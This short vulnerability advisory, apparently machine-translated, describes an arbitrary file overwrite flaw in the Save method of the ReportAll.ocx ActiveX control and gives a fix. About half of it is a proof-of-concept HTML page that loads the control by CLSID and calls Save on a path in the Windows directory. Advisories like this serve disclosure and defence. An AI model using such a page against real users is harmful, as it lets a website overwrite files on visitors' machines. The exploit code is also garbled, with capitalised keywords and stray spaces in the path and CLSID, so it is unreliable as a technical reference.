Brief description: The Save method of the ReportAll. ocx control does not filter the file name path, and any file overwrite vulnerability exists,
Detailed Description: The Save method of the ReportAll. ocx control does not filter file name paths, and any file overwrite vulnerability exists,
The following is a prototype of the Save method:
Sub Save (
ByVal FileName As String
)
Proof of vulnerability:
<Html>
<Head>
<Title> ReportAll ActiveX Control Arbitrary File Overwrite Vulnerability Poc </title>
</Head>
<Body>
<Pre>
Name: ReportAll ActiveX Control Arbitrary File Overwrite Vulnerability
Vulnerability Type: Any File Overwrite
Time detected: 2010
Remote: Yes
Affected Software: ReportAll report development tool 2.0
Affected files: ReportAll. ocx 2.0.1.1656
Test environment: Windows xp sp3 + IE6
</Pre>
<Object classid = "clsid: 568DC60B-F884-4147-8610-8C348AAFA2F8" id = "ReportAll"> </object>
<Script language = javascript>
Function do_something ()
{
Var arg1 = "c: \ windows \ NOTEPAD_.EXE ";
ReportAll. Document. Save (arg1 );
}
</Script>
<Input type = button language = javascript onclick = do_something () value = test...>
</Body>
</Html>
Solution: filter the FileName parameter of the Save method of the ReportAll. ocx control.